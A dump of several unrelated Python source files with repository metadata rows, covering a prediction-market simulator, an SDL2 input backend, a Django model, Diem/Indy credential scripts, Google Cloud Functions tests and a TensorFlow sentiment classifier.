def calc_marginal_price(self, type) -> float:
pool_total = (self.lp_no + self.lp_yes)
return (self.lp_no if type else self.lp_yes) / pool_total
def calc_slippage(self, type, amount) -> float:
tokens_return, _ = self.calc_buy(type, amount)
buy_price = amount / tokens_return
marginal_price = self.calc_marginal_price(type)
return (buy_price - marginal_price) / buy_price
@staticmethod
def calc_british_odds(returned_tokens, amount) -> float:
# british odds https://www.investopedia.com/articles/investing/042115/betting-basics-fractional-decimal-american-moneyline-odds.asp
# shows the reward on top of stake as a decimal fraction to the stake
# (TODO: we could use Fraction class of python for nice odds representation)
# may be negative when due to cpmm inefficiencies
return (returned_tokens - amount) / amount
# def sell_token(type, amount):
# def get_buy_price_yes():
# def get_sell_price_yes():
_csv_headers = [
"activity", "type", "amount", "fee", "token_buy_sell_price",
"slippage", "returned tokens", "lp_yes", "lp_no", "lp_token",
"liquidity", "fee_pool", "impermanent_loss", "loss_outstanding_tokens"
]
@property
def history_as_dataframe(self) -> pd.DataFrame:
return pd.DataFrame(data=self.history, columns=CPMM._csv_headers)
def save_history(self, name) -> None:
df = self.history_as_dataframe
with open(name, "wt") as f:
df.to_csv(f, index=False, quoting=csv.QUOTE_NONNUMERIC)
def _add_history(self, entry) -> None:
# check entry size
assert(len(entry) == len(CPMM._csv_headers))
self.history.append(entry)
def run_experiment(name, cpmm: CPMM, n, prior_dist, betting_dist):
# TODO: must have realistic model for betting behavior, for example
# total bets volume cannot cross % of liquidity
# individual bet cannot have slippage > 1% etc.
bet_outcomes = prior_dist(n)
bet_amounts = betting_dist(n)
print(f"{name}: bet outcomes N/Y {np.bincount(bet_outcomes)}")
for b, amount in zip(bet_outcomes, bet_amounts):
cpmm.buy_token(b, amount)
# print(cpmm.history)
cpmm.save_history(f"{name}.csv")
def main():
rng = default_rng()
# experiment 1
# 1000 rounds, initial liquidity 50:50 1000 EVNT, betters prior 50:50, bets integer uniform range [1, 100]
cpmm = CPMM()
cpmm.create_event(1000)
run_experiment(
"experiment1",
cpmm,
1000,
lambda size: rng.binomial(1, 0.5, size),
lambda size: rng.integers(1, 100, endpoint=True, size=size)
)
# experiment 2
# 1000 rounds, initial liquidity 50:50 1000 EVNT, betters prior 70:30, bets integer uniform range [1, 100]
cpmm = CPMM()
cpmm.create_event(1000)
run_experiment(
"experiment2",
cpmm,
1000,
lambda size: rng.binomial(1, 0.7, size),
lambda size: rng.integers(1, 100, endpoint=True, size=size)
)
# experiment 3
# 1000 rounds, initial liquidity 50:50 1000 EVNT, betters prior 70:30, bets integer uniform range [1, 100]
# fee 2% taken and not added to liquidity pool
cpmm = CPMM(fee_fraction=0.02)
cpmm.create_event(1000)
run_experiment(
"experiment3",
cpmm,
1000,
lambda size: rng.binomial(1, 0.7, size),
lambda size: rng.integers(1, 100, endpoint=True, size=size)
)
# experiment 4
# 1000 rounds, initial liquidity 50:50 1000 EVNT, betters prior 50:50, bets integer uniform range [1, 100]
# fee 2% taken and 50% added to liquidity pool
cpmm = CPMM(fee_fraction=0.02, fee_to_liquidity_fraction=0.5)
cpmm.create_event(1000)
run_experiment(
"experiment4",
cpmm,
1000,
lambda size: rng.binomial(1, 0.5, size),
lambda size: rng.integers(1, 100, endpoint=True, size=size)
)
# experiment 5
# 1000 rounds, initial liquidity 1:3 1000 EVNT, betters prior 50:50, bets integer uniform range [1, 100]
# fee 2% taken and 50% added to liquidity pool
cpmm = CPMM(fee_fraction=0.02, fee_to_liquidity_fraction=0.5)
cpmm.create_event(1000)
run_experiment(
"experiment5",
cpmm,
1000,
lambda size: rng.binomial(1, 0.5, size),
lambda size: rng.integers(1, 100, endpoint=True, size=size)
)
if __name__ == "__main__":
main()
| 32.455385 | 168 | 0.724877 | 7,761 | 0.735779 | 0 | 0 | 579 | 0.054892 | 0 | 0 | 3,685 | 0.349355 |
9ebc76ad7fb2ab59ef2ca50b8282c5e6935d4d06 | 1,184 | py | Python | modules/sdl2/input/__init__.py | rave-engine/rave | 0eeb956363f4d7eda92350775d7d386550361273 | [
"BSD-2-Clause"
]
| 5 | 2015-03-18T01:19:56.000Z | 2020-10-23T12:44:47.000Z | modules/sdl2/input/__init__.py | rave-engine/rave | 0eeb956363f4d7eda92350775d7d386550361273 | [
"BSD-2-Clause"
]
| null | null | null | modules/sdl2/input/__init__.py | rave-engine/rave | 0eeb956363f4d7eda92350775d7d386550361273 | [
"BSD-2-Clause"
]
| null | null | null | """
rave input backend using the SDL2 library.
"""
import sys
import sdl2
import rave.log
import rave.events
import rave.backends
from ..common import events_for
from . import keyboard, mouse, touch, controller
BACKEND_PRIORITY = 50
## Module API.
def load():
rave.backends.register(rave.backends.BACKEND_INPUT, sys.modules[__name__])
def unload():
rave.backends.remove(rave.backends.BACKEND_INPUT, sys.modules[__name__])
sdl2.SDL_QuitSubSystem(sdl2.SDL_INIT_JOYSTICK | sdl2.SDL_INIT_HAPTIC | sdl2.SDL_INIT_GAMECONTROLLER)
def backend_load(category):
if sdl2.SDL_InitSubSystem(sdl2.SDL_INIT_JOYSTICK | sdl2.SDL_INIT_HAPTIC | sdl2.SDL_INIT_GAMECONTROLLER) != 0:
return False
return True
## Backend API.
def handle_events():
for ev in events_for('input'):
if keyboard.handle_event(ev):
pass
elif mouse.handle_event(ev):
pass
elif touch.handle_event(ev):
pass
elif controller.handle_event(ev):
pass
else:
_log.debug('Unknown input event ID: {}', ev.type)
rave.events.emit('input.dispatch')
## Internal API.
_log = rave.log.get(__name__)
| 22.769231 | 113 | 0.688345 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 146 | 0.123311 |
9ebe258aa483e065cfc04b0e3ffeede0cfc9e13c | 862 | py | Python | setup.py | Dhruv-Jauhar/pyDownload | 4c64427037533dccf9d4dd958a46cded2422985a | [
"MIT"
]
| null | null | null | setup.py | Dhruv-Jauhar/pyDownload | 4c64427037533dccf9d4dd958a46cded2422985a | [
"MIT"
]
| null | null | null | setup.py | Dhruv-Jauhar/pyDownload | 4c64427037533dccf9d4dd958a46cded2422985a | [
"MIT"
]
| null | null | null |
try:
from setuptools import setup, find_packages
except ImportError as e:
from distutils.core import setup
dependencies = ['docopt', 'termcolor', 'requests']
setup(
name = 'pyDownload',
version = '1.0.2',
description = 'CLI based download utility',
url = 'https://github.com/Dhruv-Jauhar/pyDownload',
author = 'Dhruv Jauhar',
author_email = '[email protected]',
license = 'MIT',
install_requires = dependencies,
packages = find_packages(),
entry_points = {
'console_scripts': ['pyd = pyDownload.main:start'],
},
classifiers=(
'Development Status :: 4 - Beta',
'Intended Audience :: End Users/Desktop',
'Natural Language :: English',
'License :: OSI Approved :: MIT License',
'Programming Language :: Python',
'Programming Language :: Python :: 3.4',
#'Programming Language :: Python :: 3 :: Only',
'Topic :: Utilities'
)
)
| 25.352941 | 53 | 0.682135 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 485 | 0.562645 |
9ebfc8aff37fd8a9c5182bec54f14b5f742f7af5 | 792 | py | Python | todo/models.py | sanaullahaq/todo-API | fc4b3c46902ceae8b67d96195451dcfe404a2d48 | [
"MIT"
]
| 2 | 2020-10-28T05:00:06.000Z | 2020-10-28T05:05:35.000Z | todo/models.py | sanaullahaq/todo-API | fc4b3c46902ceae8b67d96195451dcfe404a2d48 | [
"MIT"
]
| 4 | 2021-03-30T14:09:51.000Z | 2021-06-10T20:04:28.000Z | todo/models.py | sanaullahaq/todo | afd05969b74326a72f3103f86a55225137f3faab | [
"MIT"
]
| null | null | null | from django.db import models
from django.contrib.auth.models import User
class Todo(models.Model):
title = models.CharField(max_length=100)
memo = models.TextField(blank=True) # it can be left blank
created = models.DateTimeField(auto_now_add=True)
# this will automatically add date and time and the user can't edit this
dateCompleted = models.DateTimeField(null=True, blank=True)
# this is similar to blank=True but since the date has a format like 'D M Y' that's why we should use null=True
# and blank=True if we want to left this field blank, more details on django model files documentation
important = models.BooleanField(default=False)
user = models.ForeignKey(User, on_delete=models.CASCADE)
def __str__(self):
return self.title
| 39.6 | 115 | 0.738636 | 716 | 0.90404 | 0 | 0 | 0 | 0 | 0 | 0 | 307 | 0.387626 |
7b35640cc33e749326b0108e01c9308ac2c3ffda | 603 | py | Python | pRestore/stuff.py | snaiperskaya96/pRestore | cd51050fbd02423b038233c804e1c1ee0bfe59e7 | [
"MIT"
]
| null | null | null | pRestore/stuff.py | snaiperskaya96/pRestore | cd51050fbd02423b038233c804e1c1ee0bfe59e7 | [
"MIT"
]
| null | null | null | pRestore/stuff.py | snaiperskaya96/pRestore | cd51050fbd02423b038233c804e1c1ee0bfe59e7 | [
"MIT"
]
| null | null | null | class Stuff:
def __init__(self):
return
@staticmethod
def print_logo():
print '''
____ _
_ __ | _ \ ___ ___| |_ ___ _ __ ___
| '_ \| |_) / _ \/ __| __/ _ \| '__/ _ \\
| |_) | _ < __/\__ \ || (_) | | | __/
| .__/|_| \_\___||___/\__\___/|_| \___|
|_|
'''
class NotAFolder(Exception):
def __init__(self, value):
self.value = value
def __str__(self):
return repr(self.value)
class NotAFile(Exception):
def __init__(self, value):
self.value = value
def __str__(self):
return repr(self.value)
| 19.451613 | 41 | 0.507463 | 596 | 0.988391 | 0 | 0 | 257 | 0.426202 | 0 | 0 | 207 | 0.343284 |
7b356af2edb34b8b508b0178b0361112e9713c32 | 558 | py | Python | tests/coverage/add_perf_summary.py | olvrou/CCF | 3843ff0ccf3871dc49cf2102655404d17ed5dcaf | [
"Apache-2.0"
]
| 1 | 2020-02-03T21:57:22.000Z | 2020-02-03T21:57:22.000Z | tests/coverage/add_perf_summary.py | olvrou/CCF | 3843ff0ccf3871dc49cf2102655404d17ed5dcaf | [
"Apache-2.0"
]
| null | null | null | tests/coverage/add_perf_summary.py | olvrou/CCF | 3843ff0ccf3871dc49cf2102655404d17ed5dcaf | [
"Apache-2.0"
]
| 1 | 2021-04-08T12:55:28.000Z | 2021-04-08T12:55:28.000Z | # Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the Apache 2.0 License.
import time
import json
with open("coverage.json", "r") as file:
timestamp = str(int(time.time()))
data = json.load(file)["data"][0]
lines_covered = str(data["totals"]["lines"]["covered"])
lines_valid = str(data["totals"]["lines"]["count"])
with open("perf_summary.csv", "a") as f:
f.write(
timestamp
+ ","
+ lines_valid
+ ",Unit_Test_Coverage,0,0,0,"
+ lines_covered
+ ",0,0,0,0"
)
| 26.571429 | 59 | 0.594982 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 231 | 0.413978 |
7b3573ace3d1c2705447c13d56f1be46ceaa32b4 | 1,063 | py | Python | tests/test_calculator_ui.py | ellinaMart/test_trade_calculator | d7523ba3ce00500ace9d2f9493ba7d5e483cf4f3 | [
"Apache-2.0"
]
| null | null | null | tests/test_calculator_ui.py | ellinaMart/test_trade_calculator | d7523ba3ce00500ace9d2f9493ba7d5e483cf4f3 | [
"Apache-2.0"
]
| null | null | null | tests/test_calculator_ui.py | ellinaMart/test_trade_calculator | d7523ba3ce00500ace9d2f9493ba7d5e483cf4f3 | [
"Apache-2.0"
]
| null | null | null | import pytest
import allure
from data.parameters import data_parameters
@allure.feature('UI TEST:open page')
def test_open_page(app):
with allure.step('Открываем страницу калькулятора'):
app.open_calculator_page()
assert '/calculator' in app.get_path_current_url()
@allure.feature('UI TEST: Check and calculate parameters')
@pytest.mark.parametrize('params', data_parameters, ids=[repr(x) for x in data_parameters])
def test_calculate(app, params):
with allure.step('Выбираем параметры и нажимаем рассчитать'):
app.choose_account_type("Standard")
app.choose_instrument(params[0]['symbol'])
app.choose_lot(str(params[0]["lot"]))
app.choose_leverage(f"1:{params[0]['leverage']}")
app.get_calculate()
with allure.step('Рассчитываем margin и сравниваем со значением на странице'):
margin_ui = app.get_margin()
conversion_factor = app.get_conversion_factor(params[0])
margin_calc = app.calculate_margin(params[0],conversion_factor)
assert margin_ui == margin_calc
| 39.37037 | 91 | 0.718721 | 0 | 0 | 0 | 0 | 1,095 | 0.9343 | 0 | 0 | 375 | 0.319966 |
7b3a31a3ced9da114ff604217cc00699fa473e8b | 6,383 | py | Python | indy-diem/writeTransactionSimple.py | kiva/indy-diem | c015a44b15886a2a039c3b7768cf03a6295c134e | [
"Apache-2.0"
]
| null | null | null | indy-diem/writeTransactionSimple.py | kiva/indy-diem | c015a44b15886a2a039c3b7768cf03a6295c134e | [
"Apache-2.0"
]
| 15 | 2021-08-17T15:31:07.000Z | 2021-09-20T15:11:59.000Z | indy-diem/writeTransactionSimple.py | kiva/indy-diem | c015a44b15886a2a039c3b7768cf03a6295c134e | [
"Apache-2.0"
]
| null | null | null | import asyncio
import json
import time
from cryptography.hazmat.primitives.asymmetric.ed25519 import Ed25519PrivateKey
from diem import AuthKey, testnet, utils
from indy import anoncreds, wallet
from indy import pool
from get_schema import get_schema
from diem_txn import create_diem_script, create_diem_raw_txn, sign_and_wait_diem_txn
from compress_decompress_cred_def import compress_cred_def, clean_up_cred_def_res, decompress_cred_def
from async_calls import create_master_secret, create_credential_offer, \
create_credential_req, create_credential, store_credential
PROTOCOL_VERSION = 2
CURRENCY = "XUS"
issuer = {
'did': 'NcYxiDXkpYi6ov5FcYDi1e',
'wallet_config': json.dumps({'id': 'issuer_wallet'}),
'wallet_credentials': json.dumps({'key': 'issuer_wallet_key'})
}
prover = {
'did': 'VsKV7grR1BUE29mG2Fm2kX',
'wallet_config': json.dumps({"id": "prover_wallet"}),
'wallet_credentials': json.dumps({"key": "issuer_wallet_key"})
}
verifier = {}
store = {}
async def create_schema():
# Set protocol version 2 to work with Indy Node 1.4
await pool.set_protocol_version(PROTOCOL_VERSION)
# 1. Create Issuer Wallet and Get Wallet Handle
await wallet.create_wallet(issuer['wallet_config'], issuer['wallet_credentials'])
issuer['wallet'] = await wallet.open_wallet(issuer['wallet_config'], issuer['wallet_credentials'])
# 2. Create Prover Wallet and Get Wallet Handle
await wallet.create_wallet(prover['wallet_config'], prover['wallet_credentials'])
prover['wallet'] = await wallet.open_wallet(prover['wallet_config'], prover['wallet_credentials'])
# 3. Issuer create Credential Schema
schema = {
'name': 'gvt',
'version': '1.0',
'attributes': '["age", "sex"]'
}
issuer['schema_id'], issuer['schema'] = await anoncreds.issuer_create_schema(issuer['did'], schema['name'],
schema['version'],
schema['attributes'])
store[issuer['schema_id']] = issuer['schema']
cred_def = {
'tag': 'cred_def_tag',
'type': 'CL',
'config': json.dumps({"support_revocation": False})
}
issuer['cred_def_id'], issuer['cred_def'] = await anoncreds.issuer_create_and_store_credential_def(
issuer['wallet'], issuer['did'], issuer['schema'], cred_def['tag'], cred_def['type'], cred_def['config'])
store[issuer['cred_def_id']] = issuer['cred_def']
time.sleep(1)
return issuer['schema'], issuer['cred_def']
loop = asyncio.get_event_loop()
schema_and_cred_def = loop.run_until_complete(create_schema())
# connect to testnet
client = testnet.create_client()
# generate private key for sender account
sender_private_key = Ed25519PrivateKey.generate()
# generate auth key for sender account
sender_auth_key = AuthKey.from_public_key(sender_private_key.public_key())
print(f"Generated sender address: {utils.account_address_hex(sender_auth_key.account_address())}")
# create sender account
faucet = testnet.Faucet(client)
testnet.Faucet.mint(faucet, sender_auth_key.hex(), 100000000, "XUS")
# get sender account
sender_account = client.get_account(sender_auth_key.account_address())
# generate private key for receiver account
receiver_private_key = Ed25519PrivateKey.generate()
# generate auth key for receiver account
receiver_auth_key = AuthKey.from_public_key(receiver_private_key.public_key())
print(f"Generated receiver address: {utils.account_address_hex(receiver_auth_key.account_address())}")
# create receiver account
faucet = testnet.Faucet(client)
faucet.mint(receiver_auth_key.hex(), 10000000, CURRENCY)
METADATA = str.encode(schema_and_cred_def[0])
# create script
script = create_diem_script(CURRENCY, receiver_auth_key, METADATA)
# create transaction
raw_transaction = create_diem_raw_txn(sender_auth_key, sender_account, script, CURRENCY)
sign_and_wait_diem_txn(sender_private_key, raw_transaction, client)
print("\nRetrieving SCHEMA from Diem ledger:\n")
schema = get_schema(utils.account_address_hex(sender_auth_key.account_address()), sender_account.sequence_number,
"https://testnet.diem.com/v1")
cred_def_dict = compress_cred_def(schema_and_cred_def)
METADATA_CRED_DEF = str.encode(str(cred_def_dict))
# create script
script = create_diem_script(CURRENCY, receiver_auth_key, METADATA_CRED_DEF)
# create transaction
raw_transaction = create_diem_raw_txn(sender_auth_key, sender_account, script, CURRENCY, 1)
sign_and_wait_diem_txn(sender_private_key, raw_transaction, client)
print("\nRetrieving CRE_DEF from Diem ledger:\n")
cred_def_res = get_schema(utils.account_address_hex(sender_auth_key.account_address()),
sender_account.sequence_number + 1,
"https://testnet.diem.com/v1")
filtered_cred_def = clean_up_cred_def_res(cred_def_res)
decomp_comp = decompress_cred_def(filtered_cred_def)
master_secret_id = loop.run_until_complete(create_master_secret(prover))
prover['master_secret_id'] = master_secret_id
print("\nmaster sectet id:" + master_secret_id)
cred_offer = loop.run_until_complete(create_credential_offer(issuer['wallet'], decomp_comp['id']))
# set some values
issuer['cred_offer'] = cred_offer
prover['cred_offer'] = issuer['cred_offer']
cred_offer = json.loads(prover['cred_offer'])
prover['cred_def_id'] = cred_offer['cred_def_id']
prover['schema_id'] = cred_offer['schema_id']
prover['cred_def'] = store[prover['cred_def_id']]
prover['schema'] = store[prover['schema_id']]
# create the credential request
prover['cred_req'], prover['cred_req_metadata'] = loop.run_until_complete(create_credential_req(prover))
prover['cred_values'] = json.dumps({
"sex": {"raw": "male", "encoded": "5944657099558967239210949258394887428692050081607692519917050011144233"},
"age": {"raw": "28", "encoded": "28"}
})
issuer['cred_values'] = prover['cred_values']
issuer['cred_req'] = prover['cred_req']
print("wallet:")
print(issuer['wallet'])
print("\ncred_offer:")
print(issuer['cred_offer'])
print("\ncred_req:")
print(issuer['cred_req'])
print("\ncred_values:")
print(issuer['cred_values'])
(cred_json, _, _) = loop.run_until_complete(create_credential(issuer))
prover['cred'] = cred_json
loop.run_until_complete(store_credential(prover)) | 34.690217 | 116 | 0.734608 | 0 | 0 | 0 | 0 | 0 | 0 | 1,616 | 0.253172 | 2,043 | 0.320069 |
7b3a56677628b2dcca3ff0494700cfb7a0aa4b48 | 2,173 | py | Python | Packs/GoogleCloudFunctions/Integrations/GoogleCloudFunctions/GoogleCloudFunctions_test.py | diCagri/content | c532c50b213e6dddb8ae6a378d6d09198e08fc9f | [
"MIT"
]
| 799 | 2016-08-02T06:43:14.000Z | 2022-03-31T11:10:11.000Z | Packs/GoogleCloudFunctions/Integrations/GoogleCloudFunctions/GoogleCloudFunctions_test.py | diCagri/content | c532c50b213e6dddb8ae6a378d6d09198e08fc9f | [
"MIT"
]
| 9,317 | 2016-08-07T19:00:51.000Z | 2022-03-31T21:56:04.000Z | Packs/GoogleCloudFunctions/Integrations/GoogleCloudFunctions/GoogleCloudFunctions_test.py | diCagri/content | c532c50b213e6dddb8ae6a378d6d09198e08fc9f | [
"MIT"
]
| 1,297 | 2016-08-04T13:59:00.000Z | 2022-03-31T23:43:06.000Z | import pytest
from GoogleCloudFunctions import resolve_default_project_id, functions_list_command
@pytest.mark.parametrize('project, credentials_json, expected_output,expected_exception', [
("some-project-id", {"credentials_json": {"type": "service_account", "project_id": "some-project-id"}},
"some-project-id", None),
(None, {"credentials_json": {"type": "service_account", "project_id": "some-project-id"}}, "some-project-id", None),
("some-project-id", {"credentials_json": {"type": "service_account"}}, "some-project-id", None),
(None, {"credentials_json": {"type": "service_account"}}, None, SystemExit)
])
def test_resolve_default_project_id(project, credentials_json, expected_output, expected_exception):
credentials_json = credentials_json.get('credentials_json')
if expected_exception is None:
assert resolve_default_project_id(project, credentials_json) == expected_output
else:
with pytest.raises(SystemExit):
assert resolve_default_project_id(project, credentials_json) == expected_output
def test_format_parameters():
from GoogleCloudFunctions import format_parameters
parameters_to_check = "key:value , name: lastname, onemorekey : to test "
result = format_parameters(parameters_to_check)
assert result == '{"key": "value", "name": "lastname", "onemorekey": "to test"}'
bad_parameters = "oh:no,bad"
with pytest.raises(ValueError):
format_parameters(bad_parameters)
class GoogleClientMock:
def __init__(self, region='region', project='project', functions=None):
if functions is None:
functions = []
self.region = region
self.project = project
self.functions = functions
def functions_list(self, region, project_id):
return {'functions': self.functions}
def test_no_functions():
"""
Given:
- Google client without functions
When:
- Running functions-list command
Then:
- Ensure expected human readable response is returned
"""
client = GoogleClientMock()
hr, _, _ = functions_list_command(client, {})
assert hr == 'No functions found.'
| 36.830508 | 120 | 0.698113 | 347 | 0.159687 | 0 | 0 | 966 | 0.444547 | 0 | 0 | 751 | 0.345605 |
7b3b43938d892ce413a93aef4a822d3347566181 | 11,938 | py | Python | implementation.py | Alwaysproblem/Sentimental-Analysis | 9af282842fe32e4581065a04dd47119dbabd4b01 | [
"Apache-2.0"
]
| 2 | 2019-11-06T22:57:42.000Z | 2019-11-24T04:00:21.000Z | implementation.py | Alwaysproblem/Sentimental-Analysis | 9af282842fe32e4581065a04dd47119dbabd4b01 | [
"Apache-2.0"
]
| null | null | null | implementation.py | Alwaysproblem/Sentimental-Analysis | 9af282842fe32e4581065a04dd47119dbabd4b01 | [
"Apache-2.0"
]
| null | null | null | import tensorflow as tf
import os
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'
BATCH_SIZE = 128
MAX_WORDS_IN_REVIEW = 200 # Maximum length of a review to consider
EMBEDDING_SIZE = 50 # Dimensions for each word vector
stop_words = set({'ourselves', 'hers', 'between', 'yourself', 'again',
'there', 'about', 'once', 'during', 'out', 'very', 'having',
'with', 'they', 'own', 'an', 'be', 'some', 'for', 'do', 'its',
'yours', 'such', 'into', 'of', 'most', 'itself', 'other',
'off', 'is', 's', 'am', 'or', 'who', 'as', 'from', 'him',
'each', 'the', 'themselves', 'below', 'are', 'we',
'these', 'your', 'his', 'through', 'don', 'me', 'were',
'her', 'more', 'himself', 'this', 'down', 'should', 'our',
'their', 'while', 'above', 'both', 'up', 'to', 'ours', 'had',
'she', 'all', 'no', 'when', 'at', 'any', 'before', 'them',
'same', 'and', 'been', 'have', 'in', 'will', 'on', 'does',
'yourselves', 'then', 'that', 'because', 'what', 'over',
'why', 'so', 'can', 'did', 'not', 'now', 'under', 'he', 'you',
'herself', 'has', 'just', 'where', 'too', 'only', 'myself',
'which', 'those', 'i', 'after', 'few', 'whom', 't', 'being',
'if', 'theirs', 'my', 'against', 'a', 'by', 'doing', 'it',
'how', 'further', 'was', 'here', 'than',
'wouldn', 'shouldn', 'll', 'aren', 'isn', 'get'})
def preprocess(review):
"""
Apply preprocessing to a single review. You can do anything here that is manipulation
at a string level, e.g.
- removing stop words
- stripping/adding punctuation
- changing case
- word find/replace
RETURN: the preprocessed review in string form.
"""
"""
input: the content of each training file. type : string("\n" means return)
used in the runner file line 58
output: word list form.
Note: remeber choice 100 words at random
"""
import re
page = r"<.*?>"
pieces_nopara = re.compile(page).sub("", review)
patten = r"\W+"
pieces = re.compile(patten).split(pieces_nopara)
piece = [p.lower() for p in pieces if p != '' and p.lower() not in stop_words and len(p) > 2]
processed_review = piece
return processed_review
def define_graph():
"""
Implement your model here. You will need to define placeholders, for the input and labels,
Note that the input is not strings of words, but the strings after the embedding lookup
has been applied (i.e. arrays of floats).
In all cases this code will be called by an unaltered runner.py. You should read this
file and ensure your code here is compatible.
Consult the assignment specification for details of which parts of the TF API are
permitted for use in this function.
You must return, in the following order, the placeholders/tensors for;
RETURNS: input, labels, optimizer, accuracy and loss
"""
"""
training_data_embedded[exampleNum., ]
input data is placeholder, size NUM_SAMPLES x MAX_WORDS_IN_REVIEW x EMBEDDING_SIZE
labels placeholder,
dropout_keep_prob placeholder,
optimizer is function with placeholder input_data, labels, dropout_keep_prob
Accuracy, loss is function with placeholder input_data, labels
"""
lstm_hidden_unit = 256
learning_rate = 0.00023
training = tf.placeholder_with_default(False, shape = (), name="IsTraining")
dropout_keep_prob = tf.placeholder_with_default(0.6, shape=(), name='drop_rate')
with tf.name_scope("InputData"):
input_data = tf.placeholder(
tf.float32,
shape=(BATCH_SIZE, MAX_WORDS_IN_REVIEW, EMBEDDING_SIZE),
name="input_data"
)
with tf.name_scope("Labels"):
labels = tf.placeholder(tf.float32, shape=(BATCH_SIZE, 2), name="labels")
with tf.name_scope("BiRNN"):
LSTM_cell_fw = tf.contrib.rnn.BasicLSTMCell(lstm_hidden_unit)
LSTM_cell_bw = tf.contrib.rnn.BasicLSTMCell(lstm_hidden_unit)
LSTM_drop_fw = tf.nn.rnn_cell.DropoutWrapper(
cell = LSTM_cell_fw,
output_keep_prob = dropout_keep_prob
)
LSTM_drop_bw = tf.nn.rnn_cell.DropoutWrapper(
cell = LSTM_cell_bw,
output_keep_prob = dropout_keep_prob
)
(RNNout_fw, RNNout_bw), _ = tf.nn.bidirectional_dynamic_rnn(
cell_fw = LSTM_drop_fw,
cell_bw = LSTM_drop_bw,
inputs = input_data,
initial_state_fw=LSTM_cell_fw.zero_state(BATCH_SIZE, dtype=tf.float32),
initial_state_bw=LSTM_cell_bw.zero_state(BATCH_SIZE, dtype=tf.float32),
parallel_iterations = 64
)
lastoutput = tf.concat(values = [RNNout_fw[:, -1, :], RNNout_bw[:, -1, :]], axis = 1)
with tf.name_scope("FC"):
# pred = tf.layers.batch_normalization(lastoutput, axis=1, training = training)
pred = tf.layers.batch_normalization(lastoutput, training = training)
pred = tf.layers.dense(pred, 128, activation = tf.nn.relu)
pred = tf.nn.dropout(pred, dropout_keep_prob)
# pred = tf.layers.batch_normalization(pred, axis=1, training = training)
pred = tf.layers.batch_normalization(pred, training = training)
pred = tf.layers.dense(pred, 128, activation = tf.nn.relu)
pred = tf.nn.dropout(pred, dropout_keep_prob)
# pred = tf.layers.batch_normalization(pred, axis=1, training = training)
pred = tf.layers.batch_normalization(pred, training = training)
pred = tf.layers.dense(pred, 128, activation = tf.nn.relu)
pred = tf.nn.dropout(pred, dropout_keep_prob)
# pred = tf.layers.batch_normalization(pred, axis=1, training = training)
pred = tf.layers.batch_normalization(pred, training = training)
pred = tf.layers.dense(pred, 64, activation = tf.nn.relu)
pred = tf.layers.dropout(pred, rate = dropout_keep_prob)
# pred = tf.layers.batch_normalization(pred, axis=1, training = training)
pred = tf.layers.batch_normalization(pred, training = training)
pred = tf.layers.dense(pred, 2, activation = tf.nn.softmax)
with tf.name_scope("CrossEntropy"):
cross_entropy = \
tf.nn.softmax_cross_entropy_with_logits_v2(
logits = pred,
labels = labels
)
loss = tf.reduce_mean(cross_entropy, name = "loss")
with tf.name_scope("Accuracy"):
Accuracy = tf.reduce_mean(
tf.cast(
tf.equal(
tf.argmax(pred, 1),
tf.argmax(labels, 1)
),
dtype = tf.float32
),
name = "accuracy"
)
with tf.name_scope("Optimizer"):
update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS)
optimizer = tf.train.AdamOptimizer(learning_rate).minimize(loss)
optimizer = tf.group([optimizer, update_ops])
return input_data, labels, dropout_keep_prob, optimizer, Accuracy, loss, training
# def define_graph():
# """
# Implement your model here. You will need to define placeholders, for the input and labels,
# Note that the input is not strings of words, but the strings after the embedding lookup
# has been applied (i.e. arrays of floats).
# In all cases this code will be called by an unaltered runner.py. You should read this
# file and ensure your code here is compatible.
# Consult the assignment specification for details of which parts of the TF API are
# permitted for use in this function.
# You must return, in the following order, the placeholders/tensors for;
# RETURNS: input, labels, optimizer, accuracy and loss
# """
# """
# training_data_embedded[exampleNum., ]
# input data is placeholder, size NUM_SAMPLES x MAX_WORDS_IN_REVIEW x EMBEDDING_SIZE
# labels placeholder,
# dropout_keep_prob placeholder,
# optimizer is function with placeholder input_data, labels, dropout_keep_prob
# Accuracy, loss is function with placeholder input_data, labels
# """
# lstm_hidden_unit = 256
# learning_rate = 0.001
# dropout_keep_prob = tf.placeholder_with_default(0.6, shape=(), name='drop_rate')
# input_data = tf.placeholder(
# tf.float32,
# shape=(BATCH_SIZE, MAX_WORDS_IN_REVIEW, EMBEDDING_SIZE),
# name="input_data"
# )
# input_data_norm = tf.layers.batch_normalization(input_data, axis=1)
# input_data_norm = input_data
# labels = tf.placeholder(tf.float32, shape=(BATCH_SIZE, 2), name="labels")
# LSTM_cell_fw = tf.contrib.rnn.BasicLSTMCell(lstm_hidden_unit)
# LSTM_cell_bw = tf.contrib.rnn.BasicLSTMCell(lstm_hidden_unit)
# LSTM_drop_fw = tf.nn.rnn_cell.DropoutWrapper(
# cell = LSTM_cell_fw,
# output_keep_prob = dropout_keep_prob
# )
# LSTM_drop_bw = tf.nn.rnn_cell.DropoutWrapper(
# cell = LSTM_cell_bw,
# output_keep_prob = dropout_keep_prob
# )
# (RNNout_fw, RNNout_bw), _ = tf.nn.bidirectional_dynamic_rnn(
# cell_fw = LSTM_drop_fw,
# cell_bw = LSTM_drop_bw,
# inputs = input_data_norm,
# initial_state_fw=LSTM_cell_fw.zero_state(BATCH_SIZE, dtype=tf.float32),
# initial_state_bw=LSTM_cell_bw.zero_state(BATCH_SIZE, dtype=tf.float32),
# parallel_iterations = 16
# )
# last_output = []
# for i in range(1):
# last_output.append(RNNout_fw[:, -i, :])
# last_output.append(RNNout_bw[:, -i, :])
# lastoutput = tf.concat(last_output, 1)
# with tf.name_scope("fc_layer"):
# lastoutput_norm = tf.layers.batch_normalization(lastoutput, axis=1)
# # lastoutput_norm = lastoutput
# pred = tf.layers.dense(lastoutput_norm, 128, activation = tf.nn.relu)
# pred = tf.layers.batch_normalization(pred, axis=1)
# pred = tf.layers.dropout(pred, rate = dropout_keep_prob)
# pred = tf.layers.dense(pred, 128, activation = tf.nn.relu)
# pred = tf.layers.batch_normalization(pred, axis=1)
# pred = tf.layers.dropout(pred, rate = dropout_keep_prob)
# pred = tf.layers.dense(pred, 128, activation = tf.nn.relu)
# pred = tf.layers.batch_normalization(pred, axis=1)
# pred = tf.layers.dropout(pred, rate = dropout_keep_prob)
